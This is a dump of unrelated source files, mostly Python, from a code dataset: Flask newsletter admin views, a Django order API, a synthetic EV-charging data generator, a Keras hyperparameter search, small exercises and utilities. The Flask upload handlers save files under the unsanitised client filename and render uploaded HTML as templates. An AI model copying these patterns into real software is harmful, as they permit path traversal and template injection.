current_user.is_admin:\n\t\tabort(403)\n\n\tform = LetterForm()\n\tedit = Divulgacao.query.get_or_404(id)\n\n\tif form.validate_on_submit():\n\n\t\ttarget = os.path.join(current_app.root_path, 'newsletters/templates/newsletters/uploads')\n\t\tdestination = \"/\".join([target, edit.html])\n\t\tos.remove(destination)\n\n\t\ttarget = os.path.join(current_app.root_path, 'newsletters/templates/newsletters/uploads')\n\t\tfile = form.html.data\n\t\tfilename = file.filename\n\t\tdestination2 = \"/\".join([target, filename])\n\n\t\tif os.path.exists(destination2) and (destination != destination2):\n\t\t\tflash(\"Não foi possivel salvar o arquivo!\", \"danger\")\n\t\t\tflash(\"O nome do arquivo que vc submeteu já existe, favor mudar o nome e tentar novamente!\", \"info\")\n\t\t\treturn render_template('novo_letter.html', form=form)\n\n\t\tfile.save(destination2)\n\n\t\tedit.title = form.titulo.data\n\t\tedit.body = form.front_end.data\n\t\tedit.html = filename\n\t\tdb.session.commit()\n\t\tflash(\"Newsletters modificado com sucesso\", \"success\")\n\n\t\treturn redirect(url_for(\"newsletters.listar\"))\n\n\tform.titulo.data = edit.title\n\tform.front_end.data = edit.body\n\n\treturn render_template('editar_letter.html', form=form)\n\n\n@newsletters.route('/listar', methods=['POST', 'GET'])\n@login_required\ndef listar():\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\n\tpage = request.args.get('page', 1, type=int)\n\tletters = Divulgacao.query.order_by(Divulgacao.data_criacao.asc()).paginate(page=page, per_page=10)\n\n\treturn render_template('lista_letters.html', letters=letters)\n\n\ndef send_email(letter, user, enviados, fahas, emails):\n\n\tmsg = Message(letter.title,\n                  sender='jinformatica471@gmail.com',\n                  recipients=[user.email])\n\n\tmsg.html = render_template(\"uploads/\"+letter.html, user=user)\n\tmsg.body = letter.body\n\n\ttry:\n\t\tmail.send(msg)\n\t\tenviados = enviados + 1\n\texcept Exception:\n\t\tfahas = fahas + 1\n\t\temails.append(user.email)\n\treturn enviados, fahas, emails\n\n\n@newsletters.route('/enviar_emails/<int:id>', methods=['POST', 'GET'])\n@login_required\ndef enviar(id):\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tletter = Divulgacao.query.get_or_404(id)\n\n\tusuarios = Usuario.query.filter_by(ativado=True)\n\tenviados = 0\n\tfahas = 0\n\temails = []\n\n\tfor user in usuarios:\n\n\t\tenviados, fahas, emails = send_email(letter=letter, user=user, enviados=enviados, fahas=fahas, emails=emails)\n\n\tflash(str(enviados)+\" mensagens enviadas com sucesso!\", 
\"success\")\n\tflash(str(fahas)+\" mensagens enviadas com falhas!\", \"danger\")\n\tflash(\"Isso não significa que todos os e-mails existam!\", \"danger\")\n\n\tfor email in emails:\n\t\tflash(email, \"danger\")\n\n\tletter.last_send = datetime.now()\n\tdb.session.commit()\n\n\treturn redirect(url_for('newsletters.listar'))\n\n\n@newsletters.route('/testar/<int:id>', methods=['POST', 'GET'])\n@login_required\ndef testar(id):\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tletter = Divulgacao.query.get_or_404(id)\n\tteste_user = Usuario(\"Teste User\", \"hhash\", \"Teste letters\", \"email@teste.com\", \n\t\t\t\t\t\t\t\"O sistema aqui é bruto\", 12)\n\n\treturn render_template('uploads/'+letter.html, user=teste_user)\n\n\n@newsletters.route('/material', methods=['POST', 'GET'])\n@login_required\ndef material():\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tform_edit = MaterialForm()\n\tform = MaterialForm()\n\n\tif form.validate_on_submit():\n\n\t\ttarget = os.path.join(current_app.root_path, 'static/uploads/Marketing')\n\t\tfile = form.arquivo.data\n\t\tfilename = file.filename\n\t\tdestination = \"/\".join([target, filename])\n\n\t\tif os.path.exists(destination):\n\t\t\tflash(\"Não foi possivel salvar o arquivo!\", \"danger\")\n\t\t\tflash(\"O nome do arquivo que vc submeteu já existe, favor mudar o nome e tentar novamente!\", \"info\")\n\t\t\treturn render_template('novo_letter.html', form=form)\n\t\t\t\n\t\tfile.save(destination)\n\n\t\tnova = Material(title=form.titulo.data, arquivo=filename)\n\t\tdb.session.add(nova)\n\t\tdb.session.commit()\n\t\tflash(\"Material adicionado com sucesso\", \"success\")\n\n\n\tpage = request.args.get('page', 1, type=int)\n\tmateriais = Material.query.order_by(Material.data_criacao.asc()).paginate(page=page, per_page=10)\n\n\treturn render_template('material_marketing.html', materiais=materiais, form=form, form_edit=form_edit)\n\n\n@newsletters.route('/editar_material/<int:id>', methods=['POST', 'GET'])\n@login_required\ndef edit_material(id):\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tform = MaterialForm()\n\tedit = Material.query.get_or_404(id)\n\n\tif form.validate_on_submit():\n\n\t\ttarget = os.path.join(current_app.root_path, 'static/uploads/Marketing')\n\t\tdestination = \"/\".join([target, edit.arquivo])\n\t\tos.remove(destination)\n\n\n\t\tedit.title = form.titulo.data\n\t\tfile = form.arquivo.data\n\t\tfilename = file.filename\n\t\tdestination2 = \"/\".join([target, filename])\n\n\t\tif os.path.exists(destination2) and (destination != destination2):\n\t\t\tflash(\"Não foi possivel salvar o arquivo!\", \"danger\")\n\t\t\tflash(\"O nome do arquivo que você submeteu já existe, favor mudar o nome e tentar novamente!\", \"info\")\n\t\t\treturn render_template('novo_letter.html', form=form)\n\n\t\tfile.save(destination2)\n\t\tedit.arquivo = filename\n\t\tdb.session.commit()\n\t\tflash(\"Material modificado com sucesso\", \"success\")\n\n\treturn redirect(url_for(\"newsletters.material\"))\n\n\n@newsletters.route('/deletar_material/<int:id>', methods=['POST', 'GET'])\n@login_required\ndef deletar_material(id):\n\n\tif not current_user.is_admin:\n\t\tabort(403)\n\n\tform = LetterForm()\n\n\tdelete = Material.query.get_or_404(id)\n\tdb.session.delete(delete)\n\tdb.session.commit()\n\n\tflash(\"Material deletado com sucesso\", \"info\")\n\n\treturn 
redirect(url_for(\"newsletters.material\"))\n","sub_path":"Compleaks/compleaks/newsletters/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"140546131","text":"import random\nimport string\n\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom orders.models import Order\n\n\nclass AddOrders(APIView):\n\n def post(self, request, *args, **kwargs):\n items = request.data.get('Items')\n\n item_list = str(items).split(',')\n trans_id = get_random_string(8)\n\n for item in item_list:\n\n try:\n order = Order.objects.create()\n order.trans_id = trans_id\n order.item = item\n\n order.save()\n\n except Exception as e:\n return Response({\n 'status': False,\n 'Detail': str(e)\n })\n\n return Response({\n 'status': True,\n 'Detail': 'Order ' + trans_id + ' has been created ',\n 'Item Count': len(item_list)\n })\n\n\ndef get_random_string(length):\n letters = string.ascii_uppercase\n result_str = ''.join(random.choice(letters) for i in range(length))\n return result_str\n","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"344502001","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 29 22:10:23 2021\r\n\r\n@author: sreem\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport random\r\nfrom random import seed\r\nfrom random import randint\r\nimport datetime\r\nfrom datetime import date\r\nimport csv\r\n\r\nfilename = 'Vehicleinfo.csv'\r\n\r\nVlist = ['TS08HE6446', 'AP28AN8619','TS08ER2494'] \r\n#Ebatlist = ['15','125','276','124','40', '125', '276','180','255']\r\n#Mbatlist = ['1.2','2.2','3.0','4.6','1.2','3.7','2.2','1.2','4.6','4.6','3.4','3.7','3.0','2.2','40','3.7','2.1','40','40','70','124','4.6','300']\r\nNbatlist = ['15','125','276','124','276','125','124']\r\n#array = [10, 20, 30, 40, 50, 20, 40]\r\nbike = random.uniform(1.0, 4.7)\r\nriks = random.uniform(3.7,10)\r\nl4w = random.uniform(30.0,76.4)\r\ntruck = random.uniform(100.0,400.0)\r\nbus = random.uniform(72.0,324.0)\r\ncur = base = datetime.datetime (2019,1,1,hour=12,minute=0,second=0)\r\n#cur = base = datetime.datetime.now() \r\nend = base + datetime.timedelta(days=365)\r\ndelta = datetime.timedelta(minutes=30)\r\nearlyhours = datetime.time(hour=0,minute=0,second=0)\r\nMorningH = datetime.time(hour=5,minute=0,second=0)\r\neveningH = datetime.time(hour=22,minute=0,second=0)\r\nvtype = 0\r\nbattery = 0\r\npower_con = 0\r\nwith open(filename, 'w', encoding='UTF8', newline='') as f:\r\n writer = csv.writer(f)\r\n header = ['VID','type','battery', 'iSoC','finalcharge ','charged amount','start time','stop time','duration','power_con','year','month','day', 'hour','minute']\r\n writer.writerow(header)\r\nseed(1)\r\n\r\nfor j in range(10000000):\r\n for i in range(len(Vlist)):\r\n intialcharge = x = randint(20, 50)\r\n \r\n finalcharge = randint(x,100)\r\n charge_total = finalcharge-intialcharge\r\n hour = t = base.hour\r\n start_time = float(t)\r\n \r\n duration = (charge_total*5)/100\r\n stop_time = start_time + duration\r\n #battery = randint(1,100)\r\n #battery = np.random.choice(Mbatlist)\r\n \r\n #print(\"base hour:\" + str(z))\r\n \r\n \r\n if (hour>0 and hour<=5):\r\n \r\n battery = random.uniform(80.0, 225.0)\r\n if (battery>80 and battery<150):\r\n vtype 
= 'TruckL/Dcm'\r\n                power_con = 0.125*duration\r\n            if (battery>151 and battery<200):\r\n                vtype = 'TruckM'\r\n                power_con = 1.18*duration\r\n            if (battery>201 and battery<225): \r\n                vtype = 'TruckH'\r\n                power_con = 2.5*duration\r\n        \r\n        if (hour>5 and hour<=21):\r\n            battery = random.uniform(1.0, 80.0)\r\n            if (battery>0.9 and battery<4.7):\r\n                vtype = 'bike'\r\n                power_con = 0.22*duration\r\n            if (battery>4.8 and battery<10):\r\n                vtype = 'rickshaw'\r\n                power_con = 0.32*duration\r\n            if (battery>10 and battery<40):\r\n                vtype = 'car'\r\n                power_con = 0.33*duration\r\n            if (battery>40 and battery<79):\r\n                vtype = 'bus'\r\n                power_con = 0.75*duration\r\n        \r\n        if (hour>21 or hour==0):\r\n            battery = random.uniform(10,250)\r\n            if (battery>10 and battery<100):\r\n                vtype = 'car'\r\n                power_con = 0.33*duration\r\n            if (battery>100 and battery<200):\r\n                vtype = 'bus'\r\n                power_con = 0.75*duration\r\n            if (battery>200):\r\n                vtype = 'TruckH'\r\n                power_con = 2.5*duration  \r\n        \r\n        \r\n        data = [Vlist[i], vtype, battery, intialcharge, finalcharge, charge_total, start_time, stop_time, duration,power_con,base.year, base.month, base.day, base.hour, base.minute ]\r\n        \r\n        \r\n        \r\n        with open(filename, 'a', encoding='UTF8', newline='') as f:\r\n            writer = csv.writer(f) \r\n            # write the data\r\n            writer.writerow(data)\r\n            print(\"Data written to file\")\r\n        \r\n        base = base+delta\r\n        if(base > end):\r\n            print('Generated data')\r\n            break\r\n#x = np.random.choice(array, size=1)\r\n\r\n\r\n","sub_path":"vtrial.py","file_name":"vtrial.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}{"seq_id":"461692269","text":"\"\"\" chessKnight.py\n\n__author__ = \"Albert D. Holmes\"\n__reference__ = \"https://app.codesignal.com/tournaments/wXFfAbSLArkAcTdwD/A\"\n\n\"\"\"\n\n\ndef chessKnight(cell):\n    row = ord(cell[1]) - ord('0')\n    column = ord(cell[0]) - ord('a') + 1\n    steps = [\n        [-2, -1], [-1, -2], [1, -2], [2, -1],\n        [2, 1], [1, 2], [-1, 2], [-2, 1]\n    ]\n    answer = 0\n\n    for i in range(len(steps)):\n        tmpRow = row + steps[i][0]\n        tmpColumn = column + steps[i][1]\n        if (tmpRow >= 1 and tmpRow <= 8 and\n                tmpColumn >= 1 and tmpColumn <= 8):\n            answer += 1\n\n    return answer\n\n","sub_path":"Easy/chessKnight.py","file_name":"chessKnight.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}{"seq_id":"351896640","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\nimport unittest\nfrom subprocess import CalledProcessError\n\nfrom airflow.utils import process_utils\n\n\nclass TestExecuteInSubProcess(unittest.TestCase):\n\n def test_should_print_all_messages1(self):\n with self.assertLogs(process_utils.log) as logs:\n process_utils.execute_in_subprocess([\"bash\", \"-c\", \"echo CAT; echo KITTY;\"])\n\n msgs = [record.getMessage() for record in logs.records]\n\n self.assertEqual([\n \"Executing cmd: bash -c 'echo CAT; echo KITTY;'\",\n 'Output:',\n 'CAT',\n 'KITTY'\n ], msgs)\n\n def test_should_raise_exception(self):\n with self.assertRaises(CalledProcessError):\n process_utils.execute_in_subprocess([\"bash\", \"-c\", \"exit 1\"])\n","sub_path":"tests/utils/test_process_utils.py","file_name":"test_process_utils.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"182206886","text":"from mpi4py import MPI\nfrom useful_functions import *\nimport globalvars\nimport math\nimport pandas\nfrom sklearn.model_selection import train_test_split\nfrom keras.optimizers import Nadam\nfrom keras.optimizers import Adam\nfrom keras.optimizers import RMSprop\nfrom keras.models import load_model\nfrom keras.models import model_from_json\nfrom hyperopt import Trials, STATUS_OK, tpe, rand\nfrom hyperas import optim\nfrom hyperas.distributions import choice, uniform\nfrom random import *\n\ndef activation_wrapper(name):\n\n if name == 'leakyrelu':\n return LeakyReLU()\n else:\n return Activation(name)\n\n\ndef model_adaptivity_hyperas_recycle(inputs, outputs, score_threshold, model_evals, max_num_layers, early_stopping=False, probability_model=False):\n\n n_inputs = inputs.shape[0]\n input_dimension = inputs.shape[1]\n n_nodes = math.floor( math.sqrt(n_inputs) )\n\n [X_train, y_train, X_test, y_test] = e3b3_data()\n\n mpi_comm_size = MPI.COMM_WORLD.Get_size()\n mpi_rank = MPI.COMM_WORLD.Get_rank()\n if MPI.Is_initialized() and 0==mpi_rank :\n print(\"MPI is initialized with \", mpi_comm_size, \" processes\", flush=True)\n globalvars.n_hidden_layers = 1\n #globalvars.model = []\n\n scores_loc = np.zeros( mpi_comm_size )\n scores_glob = np.zeros( mpi_comm_size )\n MPI.COMM_WORLD.Barrier()\n\n [best_run, model] = optim.minimize(model=create_model_recycle, data=e3b3_data, algo=rand.suggest, max_evals=model_evals, trials=Trials(), verbose=False)\n \n y_predict = model.predict(X_test, batch_size=1)\n score = coeff_determination(y_test, y_predict)\n scores_loc[mpi_rank] = score\n \n MPI.COMM_WORLD.Allreduce(scores_loc, scores_glob, op=MPI.SUM)\n best_proc = np.argmax(scores_glob)\n\n if 0 == mpi_rank: \n print(\"Toral number of layers: \", globalvars.n_hidden_layers, flush=True)\n print(\"Scores_glob: \", scores_glob, flush=True)\n print(\"Score: \", np.max(scores_glob), flush=True)\n\n best_run = MPI.COMM_WORLD.bcast(best_run, root=best_proc) \n model = MPI.COMM_WORLD.bcast(model, root=best_proc) \n\n MPI.COMM_WORLD.Barrier()\n if 0 == mpi_rank:\n model_json = model.to_json()\n with open(\"model.json\", \"w\") as json_file:\n json_file.write(model_json)\n\n while np.max(scores_glob) < score_threshold and globalvars.n_hidden_layers < max_num_layers :\n\n MPI.COMM_WORLD.Barrier()\n if 0 == mpi_rank:\n globalvars.n_hidden_layers += 1\n\n [best_run, model] = optim.minimize(model=create_model_recycle, data=e3b3_data, algo=rand.suggest, max_evals=model_evals, trials=Trials(), 
verbose=False) \n\n y_predict = model.predict(X_test, batch_size=1)\n score = coeff_determination(y_test, y_predict)\n scores_loc[mpi_rank] = score\n MPI.COMM_WORLD.Allreduce(scores_loc, scores_glob, op=MPI.SUM)\n best_proc = np.argmax(scores_glob)\n\n if 0 == mpi_rank: \n print(\"Toral number of layers: \", globalvars.n_hidden_layers, flush=True)\n print(\"Scores_glob: \", scores_glob, flush=True)\n print(\"Score: \", np.max(scores_glob), flush=True)\n\n best_run = MPI.COMM_WORLD.bcast(best_run, root=best_proc) \n model = MPI.COMM_WORLD.bcast(model, root=best_proc) \n if 0 == mpi_rank:\n model_json = model.to_json()\n with open(\"model.json\", \"w\") as json_file:\n json_file.write(model_json)\n \n if 0==mpi_rank:\n print(\"Best performing model chosen hyper-parameters:\", flush=True)\n print(best_run)\n\n y_predict = model.predict(X_test, batch_size=1)\n score = coeff_determination(y_test, y_predict)\n\n return [best_run, model]\n\n\ndef create_model_recycle(X_train, y_train, X_test, y_test):\n\n num_current_layers = globalvars.n_hidden_layers - 1\n \n model = Sequential()\n nodes_choice = [128,256,512,1024]\n activation_functions = ['relu', 'sigmoid', 'tanh']\n\n #first layer: the dimension of the input must be specified in the first layer\n #in this case the input is made of scalars, i.e. dimension equal to 1\n #model.add( Dense(X_train.shape[0], input_dim=X_train.shape[1], activity_regularizer=regularizers.l2({{uniform(0,0.01)}})) )\n #model.add( activation_wrapper({{choice(['relu', 'sigmoid', 'tanh', 'leakyrelu'])}}) )\n loaded_model = []\n\n mpi_rank = MPI.COMM_WORLD.Get_rank()\n if 0==mpi_rank and num_current_layers>0:\n json_file = open('model.json', 'r')\n loaded_model_json = json_file.read()\n json_file.close()\n loaded_model = model_from_json(loaded_model_json)\n\n loaded_model = MPI.COMM_WORLD.bcast(loaded_model, root=0) \n n_layers = 0\n\n if num_current_layers > 0:\n n_layers = len(loaded_model.layers)-1\n else:\n random_index = randrange(len(nodes_choice))\n num_nodes = nodes_choice[random_index]\n model.add( Dense(num_nodes, input_dim=X_train.shape[1]) )\n random_index = randrange(len(activation_functions))\n activation_function = activation_functions[random_index]\n model.add( Activation(activation_function) )\n\n for layer_size in range(n_layers):\n if layer_size%2==0:\n model.add( Dense.from_config( loaded_model.layers[layer_size].get_config() ) )\n else:\n model.add( Activation.from_config( loaded_model.layers[layer_size].get_config() ) )\n\n random_index = randrange(len(nodes_choice))\n num_nodes = nodes_choice[random_index]\n random_index = randrange(len(activation_functions))\n activation_function = activation_functions[random_index]\n model.add( Dense(num_nodes) )\n model.add( Activation(activation_function) )\n\n #last layer\n model.add( Dense(1) )\n\n #batch size is critical tu save model from GPus into a file\n batch_sizes = [128, 256, 512, 1024] \n random_index = randrange(len(batch_sizes))\n batch = batch_sizes[random_index]\n\n model.compile(loss='mse',optimizer=Adam(lr=0.0001)) \n callback_fun = keras.callbacks.EarlyStopping(monitor='val_loss', min_delta=0, patience=math.floor( math.sqrt(X_train.shape[0]) ), verbose=0, mode='auto', baseline=None, restore_best_weights=True)\n #result = model.fit(X_train, y_train, batch_size=batch, epochs=int(math.sqrt(X_train.shape[0])), verbose=0, validation_split=0.1, callbacks=[callback_fun])\n result = model.fit(X_train, y_train, batch_size=batch, epochs=X_train.shape[0], verbose=0, validation_split=0.1, 
callbacks=[callback_fun])\n #result = model.fit(X_train, y_train, batch_size=batch, epochs=1, verbose=0, validation_split=0.1, callbacks=[callback_fun])\n accuracy = model.evaluate(X_test, y_test, verbose=0)\n return {'loss': -accuracy, 'status': STATUS_OK, 'model': model}\n \n\n\n\n\n\n\n\n\n\n\n","sub_path":"MC_NN_Massi/python_utilities/NN_architecture_hyperas_MPI_recycle.py","file_name":"NN_architecture_hyperas_MPI_recycle.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"319762667","text":"\"\"\"\nDemo of HMR.\n\nNote that HMR requires the bounding box of the person in the image. The best performance is obtained when max length of the person in the image is roughly 150px.\n\nWhen only the image path is supplied, it assumes that the image is centered on a person whose length is roughly 150px.\nAlternatively, you can supply output of the openpose to figure out the bbox and the right scale factor.\n\nSample usage:\n\n# On images on a tightly cropped image around the person\npython -m demo --img_path data/im1963.jpg\npython -m demo --img_path data/coco1.png\n\n# On images, with openpose output\npython -m demo --img_path data/random.jpg --json_path data/random_keypoints.json\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys\nimport os\nfrom absl import flags\nimport numpy as np\nimport pickle\n\nimport skimage.io as io\nimport tensorflow as tf\n\nfrom src.util import image as img_util\nfrom src.util import openpose as op_util\nimport src.config\nfrom src.RunModel import RunModel\n\nflags.DEFINE_string('img_path', 'data', 'Directory of images to run')\nflags.DEFINE_string('json_path', 'openpose', 'If specified, uses the openpose output to crop the image.')\nflags.DEFINE_string('pkl_path', 'data', 'output pkl')\n\n\ndef preprocess_image(img_path, json_path=None):\n img = io.imread(img_path)\n if img.shape[2] == 4:\n img = img[:, :, :3]\n\n if json_path is None:\n if np.max(img.shape[:2]) != config.img_size:\n print('Resizing so the max image size is %d..' % config.img_size)\n scale = (float(config.img_size) / np.max(img.shape[:2]))\n else:\n scale = 1.\n center = np.round(np.array(img.shape[:2]) / 2).astype(int)\n # image center in (x,y)\n center = center[::-1]\n else:\n scale, center = op_util.get_bbox(json_path)\n\n if scale is None:\n return None, None, None\n\n crop, proc_param = img_util.scale_and_crop(img, scale, center,\n config.img_size)\n\n # Normalize image to [-1, 1]\n crop = 2 * ((crop / 255.) 
- 0.5)\n\n return crop, proc_param, img\n\n\ndef main(img_path, pkl_path, json_path):\n sess = tf.Session()\n model = RunModel(config, sess=sess)\n\n count = len(os.listdir(json_path))\n for ix, f in enumerate(os.listdir(json_path)):\n if not f.endswith(\".json\"):\n continue\n\n print('Processing %d/%d: %s' % (ix+1, count, f))\n\n js = os.path.join(json_path, f)\n\n fname = f.replace('_keypoints.json', '.jpg')\n img = os.path.join(img_path, fname)\n\n input_img, proc_param, img = preprocess_image(img, js)\n if input_img is None:\n print('no keypoints')\n continue\n\n # Add batch dimension: 1 x D x D x 3\n input_img = np.expand_dims(input_img, 0)\n joints, verts, cams, joints3d, theta = model.predict(input_img, get_theta=True)\n\n out_name = f.replace('_keypoints.json', '_mesh.pkl')\n out_path = os.path.join(pkl_path, out_name)\n\n with open(out_path, 'wb') as outf:\n pickle.dump([joints, verts, cams, joints3d, theta], outf)\n\n\nif __name__ == '__main__':\n config = flags.FLAGS\n config(sys.argv)\n # Using pre-trained model, change this to use your own.\n config.load_path = src.config.PRETRAINED_MODEL\n config.batch_size = 1\n\n main(config.img_path, config.pkl_path, config.json_path)\n","sub_path":"demo_batch.py","file_name":"demo_batch.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"543545656","text":"\"\"\" Functions Map \"\"\"\ndef searchingAlgorithms():\n return [\n ('Binary Search', 'binarySearch')\n ]\n\n\"\"\" Binany Search \"\"\"\ndef binarySearch(array, item):\n first = 0\n last = len(array)-1\n found = False\n\n while first<=last and not found:\n midpoint = (first + last)//2\n if array[midpoint] == item:\n found = True\n else:\n if item < array[midpoint]:\n last = midpoint-1\n else:\n first = midpoint+1\n\n return found\n","sub_path":"python/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"91305335","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 22 10:27:21 2017\n\n@author: SRG\n\"\"\"\n\nimport cv2\nimport os\n\nOUTPUT_DIR = 'E:/ParkingSlotDetection/db/[20171222]_LG_AVM/rectified/set1'\nif os.path.isdir(OUTPUT_DIR) == False:\n os.mkdir(OUTPUT_DIR)\n \ncap = cv2.VideoCapture('E:/ParkingSlotDetection/db/[20171222]_LG_AVM/2017.12.22 09.38.45.mp4')\n\nidx = 0\nwhile(cap.isOpened()):\n ret, frame = cap.read()\n \n if frame is not None:\n frame[315:781,856:1067,:] = 0\n img = frame[:,663:1260,:]\n img = cv2.resize(cv2.flip(cv2.transpose(img),0), (392,240))\n cv2.imwrite('{}/{:08d}.png'.format(OUTPUT_DIR,idx), img)\n cv2.imshow('frame',img)\n idx += 1 \n cv2.waitKey(1)\n \ncap.release()\ncv2.destroyAllWindows()","sub_path":"utils/video2image.py","file_name":"video2image.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"95491106","text":"# Here is where the initial conditions of the electron are defined\n# This filename is the input parameter of the eTracks.py file\n\nr_0 = 0.779792 # 0.767132 #initial radius in c/w_p\nvr_0 = (r_0 - 0.776168)/(837.322 - 837.317)\nvz_0 = -1 # set arbitrarily when p < 1\npr_0 = 1.10027 # initial momentum in m_e c\npz_0 = -0.0445353\nxi_0 = 6.47308 # initial xi-position in c/w_p\nSHModel = False # True to use SHM model, False to use OSIRIS fields\ntrack = 'max' # name of track if 
applicable\n","sub_path":"input/max2.py","file_name":"max2.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"385891267","text":"# 15. 末尾のN行を出力\n# 自然数Nをコマンドライン引数などの手段で受け取り,入力のうち末尾のN行だけを表示せよ.\n# 確認にはtailコマンドを用いよ.\n\nfrom knock10 import read_file\nimport sys\n\ndef tail(target: str, line: int) -> str:\n target = target.split(\"\\n\")\n return \"\\n\".join(target[len(target)-line:])\n\nif __name__ == \"__main__\":\n args = sys.argv\n n = int(args[1])\n target = read_file(\"hightemp.txt\")\n print(tail(target, n))","sub_path":"takahashi/chapter02/knock15.py","file_name":"knock15.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"42443880","text":"from tkinter import *\n \n \nroot = Tk()\n \n \ndef open_file():\n file_1 = open(file_name.get())\n file_content.insert(1.0, file_1.read())\n \ndef save_file():\n file_2 = open(file_name.get(), 'w')\n file_2.write(file_content.get(1.0, END))\n \n \nroot.title('Copying')\n \nframe = Frame()\nframe_file_content = Frame()\n \nfile_name = Entry(frame, bd=4, relief=GROOVE, width='25')\n \nbutton_open = Button(frame, text=' Open the old file ', command=open_file)\nbutton_save = Button(frame, text=' Save to new one ', command=save_file)\n \nfile_content = Text(frame_file_content, bg='#FFFFE0', width='50', height='20', wrap=NONE)\n \nYscroll = Scrollbar(frame_file_content, command=file_content.yview)\nXscroll = Scrollbar(orient=HORIZONTAL, command=file_content.xview)\n \nfile_content.configure(yscrollcommand=Yscroll.set, xscrollcommand=Xscroll.set)\n \n \nframe.pack()\nfile_name.pack(side=LEFT)\nbutton_open.pack(side=LEFT)\nbutton_save.pack(side=LEFT)\nframe_file_content.pack(fill=BOTH, expand=1)\nfile_content.pack(side=LEFT, fill=BOTH, expand=1)\nYscroll.pack(side=LEFT, fill=Y)\nXscroll.pack(side=BOTTOM, fill=X)\n \n \nroot.mainloop()","sub_path":"redaktor_v2.py","file_name":"redaktor_v2.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"151956161","text":"import json\n\n\ndef loadPoints(filename, type):\n with open(\"routes/\" + filename) as f:\n raw_json = f.read()\n json_object = json.loads(raw_json)\n raw_points = json_object[type]\n\n points = []\n for raw_point in raw_points:\n points.append({\n \"id\": int(raw_point['id'].encode('ascii')),\n \"lat\": float(raw_point['lat']),\n \"lon\": float(raw_point['lon'])\n })\n return points","sub_path":"dataLoader.py","file_name":"dataLoader.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"338476296","text":"import argparse\n\ndef parseArgs():\n parser = argparse.ArgumentParser(\n description=\"Translates a single character to it's ASCII Equivalent\"\n )\n\n parser.add_argument('char',help='Character to be translated to ASCII')\n\n types = parser.add_mutually_exclusive_group()\n\n types.add_argument('--hex',help=\"Return value in hexadecimal\",action='store_true')\n types.add_argument('--oct',help=\"Return value in octal\",action='store_true')\n\n return parser.parse_args()\n\ndef main():\n\n args = parseArgs()\n if(len(args.char) > 1):\n print(\"Error: Too many characters\")\n return 1\n\n dec = ord(args.char)\n\n if(args.hex):\n print(hex(dec))\n return 0\n\n if(args.oct):\n print(oct(dec))\n return 0\n\n print(dec)\n 
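knock15.py above keeps the last N lines of a text by slicing the list produced by split("\n"); a standalone check of that behavior (the sample strings are made up):

```python
def tail(target, line):
    rows = target.split("\n")
    return "\n".join(rows[len(rows) - line:])  # same as rows[-line:] for line > 0

assert tail("a\nb\nc\nd", 2) == "c\nd"
assert tail("only", 1) == "only"
```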
